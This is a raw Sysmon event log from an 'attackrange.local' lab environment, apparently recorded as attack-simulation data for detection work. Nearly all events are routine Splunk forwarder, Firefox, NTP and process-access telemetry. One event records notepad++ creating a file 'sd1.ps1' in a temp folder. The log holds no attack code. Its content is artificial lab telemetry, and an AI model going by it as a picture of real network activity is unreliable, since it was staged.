\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de 10341000x80000000000000001047061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d 11241100x80000000000000001047060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps12021-07-12 07:47:36.085 23542300x8000000000000000806743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:37.893{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1FF80F4A8ED25232060CDE63C866C60,SHA256=0EEE00F94E4D5EDD0C938DA9F4597B2F550DC69DD00659A953D7E4D0181DBAB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:37.215{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C151CC5D9A77E44321CDEEB198DDC6CE,SHA256=E0BECE4568CFB94F7A3949CF7EB791209A727C2AB4088F6A8AF9D53834EE190D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:38.909{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A50B3F8421C7E8AE07A0B57A087774B,SHA256=B9307C494A2F5C399D59AB30903EB3CE7AC8FB521E94216657D62800C165CEC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:38.485{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0207B6AF6851FAACBB9E46896BEE388B,SHA256=1494F3CC3526CFE484CF3AF0A4B3A02350BBE944E6D88A94AC33B8B843E5FDEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:38.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C24A2B36B5129C08408142B6B2907D0A,SHA256=A6F8CF01180A853E344C6ADE6CC721E03EAB1759FAA7A345E9D9F11423EF9964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:39.924{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6122BCA6D0F75D70352C81FBA170470D,SHA256=DC8785AC3E1455DC95820F969EBA62EF7F1EFCC2449D4FB3FF7528AF478A431E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:39.232{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5EBB584FAE538C2DD52763DDC1B923,SHA256=973B88B562736FC42A2BFE936D67D60F11501FCD55E2C3D47C8A6B26887E1B91,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:38.275{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57204-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:40.971{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D7DD809CE9A7FB583728F0B7C71017,SHA256=0930F61D422D1DF110FC143A9477587A87A0EE55801FA61CEDE81977514FB9CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50956-false10.0.1.12-8000- 23542300x80000000000000001047147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:40.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9600357BB104448502D4099B8CCFB4A,SHA256=891FBCD829D698227A607B873FB5B34441010E045C5ECC69AAEAED4E50F2E223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.915{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DC50045B664F1BA7D5BEBB888F4F28B8,SHA256=7A0CBFE3C1637A96916BAEB526C4419F72D00ACE8DE0F328144BA210C777F00E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.915{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=157F693F4E51D94DA8A7E379D8E7BDBC,SHA256=4B96C945F6C4F149D9650D7A4EE23A4BAADC5EC6D5219F33F06B9A2D196BC41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7CD9AA6A35158B09D8082990B77C36A7,SHA256=CB559C2A5D68D782376F2315CA032B4250F8E3021AF4F460B4FC3C9A25105837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F74099A4A3866FD6B1CB4D0FEACAB390,SHA256=123E28A64690A3404C0B1E83E90429F9DD255FB512FCD5ADA88D9DA3C551E5CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7287B5E5E932885845D92597C1432299,SHA256=E52B32B3B0BC6F6F37583F72AC57E35EA4AF180C6C5CB115254BEDE654B30F4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6DA303825C1E51F23AB07EE8C1FC95E9,SHA256=A54F15A7386CBCDCFD4892D18F68F8F7116E127661C9E80F1E6E1128D8549E7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2A444EDFE1D68B556C3763CB6F3DDC34,SHA256=92EFBF138B05CC21E53E10A0C08E9B965CAF497FDDBA2C24D6CA3710D13F40BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=288D24AC70965A8B940CF60A278B02DC,SHA256=C54B55EF45A529A35710273102F7FCCF39F70225A299715D7EB67B9B75BC6E17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E82B17A7673FB1AFA616725AA247EE64,SHA256=81071026562F60CF544D1525A90DA3D2F0CE24297642147436AE65D2C43945E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7554B237D3E7E8561CAABA8D8100DC3D,SHA256=A52CB31B2A5443511172203244D9BE84173552686CDF8AFCA84EFB3C0E7B78BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E3DD385343381166D169B4B6CDFEE748,SHA256=69269029C52A856C46B9AA981E0B3FD26EB6A7A60BC49509C1960124F6E8A40D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7666A9025030A2FB4192A445167E7E55,SHA256=10B5A31CABE011A5CB66C20D840B6F9CCED76B5CFF630249228E4DC52982B6BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:42.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=905AAF0692F54E1ECF8F3A12A22037CE,SHA256=816B710E019CE383369E80AE633CA0BECD788522711DFF1382898CE1D2588128,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000806749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:47:42.473{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f2-0x320f2ee7) 23542300x8000000000000000806748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:42.004{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418CE3FF6A56C26BAC61B5AD5889C108,SHA256=BBB42141F4CABDFAB2B5A201B8DFCDDCD6ADEE5755C293C0150EFB36A8F45589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:43.284{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E310142C159F497BE9175AC741863C,SHA256=2CBF4386A121155640B3677FDDB5057AD82F74610E5892099C653028D78CA14A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:42.605{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x8000000000000000806751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:42.605{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal123ntp 23542300x8000000000000000806750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:43.017{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B51C57B0F9DC93F90207B69FC6730FE1,SHA256=7A25DBAE6D4260A309D3EAEC30E06A964DF3C3CA91B94955EF589A7BC16B203C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:44.915{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=87B77072FFB2C90FA5EAF25239CC4493,SHA256=0633CF3F00349F15EDFAE505F6333FE2F96C6B4117FF28F27CAF117B10EC5469,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.005{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal123ntp 23542300x80000000000000001047163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:44.300{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF684DD9E68F6257406D76590E4E0E1,SHA256=6EEB447589AFB17F598E4A065333A4BB4EC691CE68FD40B6B20F2E4EE45348B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:44.019{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=503D1A59F381A7252677923F8A813C19,SHA256=A1B380A1CA73AF7BF5DF4A2F2C24E68AB3769AE62D363F2844B683B13DD5DC43,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:37.699{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50957-false10.0.1.12-8000- 23542300x80000000000000001047166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:45.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=552CABD9353099089FCD5D012CB152C9,SHA256=C96C4AE954E42BF86086735004C6F4F9CE9E4DDB6549C71469BA8C196FD40468,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:44.261{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57205-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:45.019{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D93A04BCD86867F9EBC05B4FE4F5B75,SHA256=AD4BB6A12C6DB8596726D7C406EC1E1CFBD30271AD1CA1506C6D74D9AA11EEBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:46.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8BFEDDCB967CC59D77316A6845B59C8,SHA256=3A4D0F1ABAA47651C8DAD8B430C904A900FAB3E7DE41B92A89E270E8C77E8E26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:46.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC2CBB1FCFABDB09ACEE6B7C2E4D3E29,SHA256=A9E765347864626DA615DFC2266BA9E547353F880618030B30AB27ABB66A6FA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:47.346{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18CCCD43FDA92E5F17672E07E7F55B8,SHA256=5B26CA78DDDA0BDA6562C062F62DF41BA3E4B774A12799622C6D78CC59912DAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:47.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485BC0A44B3B1A58DE3F3544CD80F8DE,SHA256=D2ED25CE9C229FF2C883C011CA5E65B94EEC9E343E305069D55D68684F686F97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:48.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921D8DC94759CA863D16D9C8C1772A12,SHA256=59BFDE0699D3D86F7D8CA0E07FF614DBDF57A6D6D4F697BDA21DAEF512A05F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:48.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4FCE9ABB5A4C56C07635DF5345DB638,SHA256=72BD730DDBD95DC6517E03406D78FB2643E7D79B58EF7CA3534BE29F107EB22F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:49.382{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D105172BCE1CF875A0DDD38D6953BF,SHA256=74AFCB256C1930B80C41C196BF7310C34DFB2C3124C16F1C7A97FAEA471A3DFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:49.191{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E997892560AD22E61ED841ADC13FC1,SHA256=87C6C4FA6909FF71C2F8EC830F396DE56D288729E126C8C062DB7A2A178A3B08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.982{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=60AA3CB50947AEEB7EE1898933287EAE,SHA256=7FA1C71AC469F91E91D660B7313A70A73D938EE201A7D96FDD540804CE99914B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 